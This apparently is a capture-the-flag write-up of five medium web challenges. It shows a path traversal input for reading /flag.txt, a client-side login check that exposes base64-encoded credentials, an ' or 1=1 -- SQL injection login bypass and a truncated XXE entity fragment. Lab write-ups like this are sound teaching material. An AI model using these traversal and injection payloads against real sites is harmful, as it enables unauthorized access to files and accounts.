# Medium
| Problem | Difficulty |
| --------------- | ---------- |
| Forbidden paths | Medium |
| Login | Medium |
| Matchtheregex | Medium |
| More sqli | Medium |
| Soap | Medium |
{% stepper %}
{% step %}
### Forbidden Paths
> **Description**
>
> Can you get the flag?We know that the website files live in `/usr/share/nginx/html/` and the flag is at `/flag.txt` but the website is filtering absolute file paths. Can you get past the filter to read the flag?Here's the [website](http://saturn.picoctf.net:63193/).
seems like it was a page to read files so knowing that my mind was telling me what if we could do path traversal so i tried reading ../../../../../flag.txt
easy solve :smile:
{% endstep %}
{% step %}
### Login
When enumerating the page source i found something interesting
{% code overflow="wrap" %}
```javascript
(async()=>{await new Promise((e=>window.addEventListener("load",e))),document.querySelector("form").addEventListener("submit",(e=>{e.preventDefault();
const r={u:"input[name=username]",p:"input[name=password]"},t={};
for(const e in r)
t[e]=btoa(document.querySelector(r[e]).value).replace(/=/g,"");
return"YWRtaW4"!==t.u?alert("Incorrect Username"):
"cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ"!==t.p?alert("Incorrect Password"):
void alert(`Correct Password! Your flag is ${atob(t.p)}.`)}))})();
```
{% endcode %}
you can see that it checks if the username is `YWRtaW4`in base64 it translates to admin
after we gain the username and password we can login and get the flag :thumbsup:
{% endstep %}
{% step %}
### Match the regex
after enumerating the page source code
we found a function that just so happens to have a suspicious comment im pretty sure that means we can submit anything that starts with p and has any element per dot then ends with F
easily solved :smile:
{% endstep %}
{% step %}
### More sqli
when i try to login with random creds
the website actually shows the sql query that it did so this challenge becomes very easy!
we can just use
```
' or 1=1 --
```
to bypass the login
the challenge is not over yet!
we got another website now where could that flag be :thinking:
anything familiar?
yup we solved the challenged very easily :sunglasses:
{% endstep %}
{% step %}
### Soap
while casually playing around with the website i found something interesting
the website seems to use xml after studying about xml i suspected that the website might be vulnerable to XXE injection
```
]>
&xxe;
```
Solved the challenge easily again :laughing:
{% endstep %}
{% endstepper %}
